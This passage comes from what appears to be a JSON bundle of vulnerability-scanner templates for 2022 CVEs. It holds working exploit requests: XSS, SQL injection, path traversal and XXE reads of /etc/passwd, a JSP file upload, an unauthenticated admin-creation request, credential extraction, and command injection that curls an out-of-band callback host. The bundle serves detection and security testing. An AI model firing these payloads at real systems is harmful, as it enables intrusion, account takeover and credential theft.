/wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'colspan=\\\"2\\\"><script>alert(document.domain)</script></th>')"],"condition":"and"}]}]},{"id":"CVE-2022-3484","info":{"name":"WordPress WPB Show Core - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"wpb_jplayer_setting\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-26352","info":{"name":"DotCMS - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/content/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n--------------------------aadc326f7ae3eac3\nContent-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\nContent-Type: text/plain\n\n<%\nout.println(\"CVE-2022-26352\");\n%>\n--------------------------aadc326f7ae3eac3--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"CVE-2022-26352\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-30514","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30525","info":{"name":"Zyxel Firewall - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /ztp/cgi-bin/handler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-25369","info":{"name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Success\": true","\"Success\":true"],"condition":"or"},{"type":"word","part":"header","words":["application/json","ASP.NET_SessionId"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0535","info":{"name":"WordPress E2Pdf <1.16.45 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_nonce={{nonce}}&e2pdf_user_email=&e2pdf_api=api.e2pdf.com&e2pdf_connection_timeout=300&e2pdf_processor=0&e2pdf_dev_update=0&e2pdf_url_format=siteurl&e2pdf_mod_rewrite=0&e2pdf_mod_rewrite_url=e2pdf%2F%25uid%25%2F&e2pdf_cache=0&e2pdf_cache=1&e2pdf_cache_fonts=0&e2pdf_cache_fonts=1&e2pdf_debug=0&e2pdf_hide_warnings=0&e2pdf_images_remote_request=0&e2pdf_images_timeout=30&e2pdf_revisions_limit=3&e2pdf_memory_time=0&e2pdf_developer=0&e2pdf_developer_ips=%3C%2Ftextarea%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&submit=Save+Changes\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, 'placeholder=\\\"Developer IPs\\\" ></textarea><svg/onload=alert(document.domain)>')","contains(header_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-0786","info":{"name":"WordPress KiviCare <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Doctor details\")"],"condition":"and"}]}]},{"id":"CVE-2022-32409","info":{"name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39952","info":{"name":"Fortinet FortiNAC - Arbitrary File Write","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/configWizard/keyUpload.jsp"],"body":"--{{boundaryId}}\nContent-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n{{randstr}}\n--{{boundaryId}}--\n","headers":{"Content-Type":"multipart/form-data; boundary={{boundaryId}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["zipUploadSuccess","SuccessfulUpload"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31373","info":{"name":"SolarView Compact 6.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/Solar_AiConf.php/\"><script>alert(document.domain)</script>","HREF=\"Solar_Service.php\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45933","info":{"name":"KubeView <=0.1.31 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/scrape/kube-system"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN CERTIFICATE","END CERTIFICATE","kubernetes.io"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31798","info":{"name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[",\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33965","info":{"name":"WordPress Visitor Statistics <=5.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"regex","regex":["^1331' and sleep\\(7\\) or '$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29775","info":{"name":"iSpy 7.2.2.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logfile?d=crossdomain.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Log Start","Log File","iSpy"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2756","info":{"name":"Kavita <0.5.4.1 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/account/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n","POST /api/upload/upload-by-url HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"url\":\"http://oast.me/#.png\"}\n","GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["Interactsh Server"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*?)\""],"internal":true},{"type":"regex","name":"filename","group":1,"regex":["coverupload.(.*?).png"],"internal":true}]}]},{"id":"CVE-2022-42096","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_tags[und]\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_1}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[date]\"\n\n2023-04-25\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"promote\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-24\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"comment\"\n\n2\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryIubltUxssi0yqDjp--\n","GET /?q=posts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-33174","info":{"name":"Powertek Firmware <3.30.30 - Authorization Bypass","severity":"high"},"requests":[{"raw":["GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\nHost: {{Hostname}}\nCookie: tmpToken=;\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<sys.passwd>","<sys.su.name>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<sys\\.passwd>([A-Z0-9a-z]+)<\\/sys\\.passwd>","<sys\\.su\\.name>([a-z]+)<\\/sys\\.su\\.name>"],"part":"body"}]}]},{"id":"CVE-2022-2187","info":{"name":"WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\"></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","Contact Form 7"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0342","info":{"name":"Zyxel - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/export-cgi?category=config&arg0=startup-config.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["interface-name","saved at"],"condition":"and"},{"type":"word","part":"header","words":["text/zyxel","attachment; filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34046","info":{"name":"WAVLINK WN533A8 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /sysinit.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-0591","info":{"name":"Formcraft3 <3.8.28 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/formcraft3/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: WordPress"]}]}]},{"id":"CVE-2022-41441","info":{"name":"ReQlogic v11.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script>","{{BaseURL}}/ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3"],"stop-at-first-match":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"POProcessTimeout\")"],"condition":"and"}]}]},{"id":"CVE-2022-27043","info":{"name":"Yearning - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd","{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body) || contains_all(body, '[fonts]', 'for 16-bit app support')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-28365","info":{"name":"Reprise License Manager 14.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/rlminfo"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Version","Platform type"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2383","info":{"name":"WordPress Feed Them Social <3.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Feed Them Social","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)><br/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0824","info":{"name":"Webmin <1.990 - Improper Access Control","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect=1;testing=1;PHPSESSID=;\n\nuser={{username}}&pass={{password}}\n","POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/filemin/?xnavigation=1\n\nlink=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Failed to write to /{{ranstr}}/index.html"]}]}]},{"id":"CVE-2022-43016","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=<script>alert(document.domain)</script>&a=authenticate HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["EVAL=<script>alert(document.domain)</script>","cats_connected"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2174","info":{"name":"microweber 1.2.18 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"],"matchers":[{"type":"dsl","dsl":["status_code == 500","contains(body, \"<script>alert(document.domain)</script>\") && contains(body, \"microweber\")","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-23779","info":{"name":"Zoho ManageEngine - Internal Hostname Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/themes"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/themes/","text/html"],"condition":"and"},{"type":"word","part":"location","negative":true,"words":["{{Host}}"]},{"type":"word","words":["<center><h1>301 Moved Permanently</h1></center>"]},{"type":"regex","part":"location","regex":["https?:\\/\\/(.*):"]},{"type":"status","status":[301]}],"extractors":[{"type":"regex","group":1,"regex":["https?:\\/\\/(.*):"],"part":"location"}]}]},{"id":"CVE-2022-1713","info":{"name":"Drawio <18.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /proxy?url=http%3a//0:8080/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Flowchart Maker & Online Diagram Software</title>"]},{"type":"word","part":"header","words":["application/octet-stream"]}]}]},{"id":"CVE-2022-25568","info":{"name":"MotionEye Config Info Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["upload_password","network_password"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0149","info":{"name":"WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22947","info":{"name":"Spring Cloud Gateway Code Injection","severity":"critical"},"requests":[{"raw":["POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicates\": [\n    {\n      \"name\": \"Path\",\n      \"args\": {\n        \"_genkey_0\": \"/{{randstr}}/**\"\n      }\n    }\n  ],\n  \"filters\": [\n    {\n      \"name\": \"RewritePath\",\n      \"args\": {\n        \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n        \"_genkey_1\": \"/${path}\"\n      }\n    }\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","POST /actuator/gateway/refresh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n  \"route_id\": \"{{randstr}}\",\n  \"filters\": [\n    \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/routes/{{randstr}}"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2022-26148","info":{"name":"Grafana & Zabbix Integration - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redirect=%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zabbix\":","\"zbx\":","alexanderzobnin-zabbix-datasource"],"condition":"or"},{"type":"regex","part":"body","regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\"","\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php"]}]}]},{"id":"CVE-2022-2414","info":{"name":"FreeIPA - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /ca/rest/certrequests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<CertEnrollmentRequest>\n  <Attributes/>\n  <ProfileID>&ent;</ProfileID>\n</CertEnrollmentRequest>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["PKIException"]},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-0437","info":{"name":"karma-runner DOM-based Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/karma.js","{{BaseURL}}/?return_url=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 6.3.14')"]},{"type":"word","part":"body_2","words":["Karma"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)VERSION: '([0-9.]+)'"],"internal":true}]}]},{"id":"CVE-2022-40843","info":{"name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET /goform/downloadSyslog/syslog.log HTTP/1.1\nHost: {{Hostname}}\nCookie: W15Ev2_user=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["^0\\d{3}$"]},{"type":"word","part":"body","words":["[system]","[error]","[wan1]"],"condition":"or"},{"type":"word","part":"header","words":["Content-type: config/conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46888","info":{"name":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?secret=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\">","NexusPHP"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0948","info":{"name":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/olistener/new HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"id\":\" (SLEEP(6))#\"}\n","GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"application/json\")","contains(body_2, \"olistener-action.olistener-controller\")"],"condition":"and"}]}]},{"id":"CVE-2022-1162","info":{"name":"GitLab CE/EE - Hard-Coded Credentials","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-4260","info":{"name":"WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\nHost: {{Hostname}}\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n","GET / HTTP/1.1\nHost: {{Hostname}}\nReferer: XSS\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_4, \"<script>alert(document.domain);</script>\")","contains(content_type_4, 